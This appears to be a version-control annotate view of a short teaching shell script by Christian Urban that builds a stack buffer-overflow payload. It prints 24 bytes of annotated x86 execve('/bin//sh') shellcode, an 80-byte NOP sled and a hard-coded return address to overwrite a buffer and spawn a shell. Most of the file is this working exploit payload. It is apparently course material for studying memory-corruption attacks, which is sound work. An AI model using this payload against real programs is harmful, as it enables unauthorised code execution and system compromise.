| author | Christian Urban <urbanc@in.tum.de> |
| Sat, 23 Sep 2017 13:08:35 +0100 | |
| changeset 518 | e1fcfba63a31 |
| parent 400 | f05368d007dd |
| permissions | -rwxr-xr-x |
| 27 | 1 |
#!/bin/sh |
2 |
||
|
115
c4008b31df8e
added material
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
27
diff
changeset
|
3 |
# shellscript that overwrites the buffer with |
|
c4008b31df8e
added material
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
27
diff
changeset
|
4 |
# some payload for opening a shell (the payload |
|
c4008b31df8e
added material
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
27
diff
changeset
|
5 |
# cannot contain any \x00) |
| 27 | 6 |
|
7 |
||
|
400
f05368d007dd
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
201
diff
changeset
|
8 |
shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62 |
|
f05368d007dd
updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
201
diff
changeset
|
9 |
\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" |
| 27 | 10 |
|
11 |
# 24 bytes of shellcode |
|
12 |
||
13 |
# "\x31\xc0" // xorl %eax,%eax |
|
14 |
# "\x50" // pushl %eax |
|
15 |
# "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e |
|
16 |
# "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f |
|
17 |
# "\x89\xe3" // movl %esp,%ebx |
|
18 |
# "\x99" // cltd |
|
19 |
# "\x52" // pushl %edx |
|
20 |
# "\x53" // pushl %ebx |
|
21 |
# "\x89\xe1" // movl %esp,%ecx |
|
22 |
# "\xb0\x0b" // movb $0xb,%al |
|
23 |
# "\xcd\x80" // int $0x80 |
|
24 |
||
25 |
padding=`perl -e 'print "\x90" x 80'` |
|
26 |
||
|
115
c4008b31df8e
added material
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
27
diff
changeset
|
27 |
# need s correct address in order to run |
| 27 | 28 |
printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00" |
29 |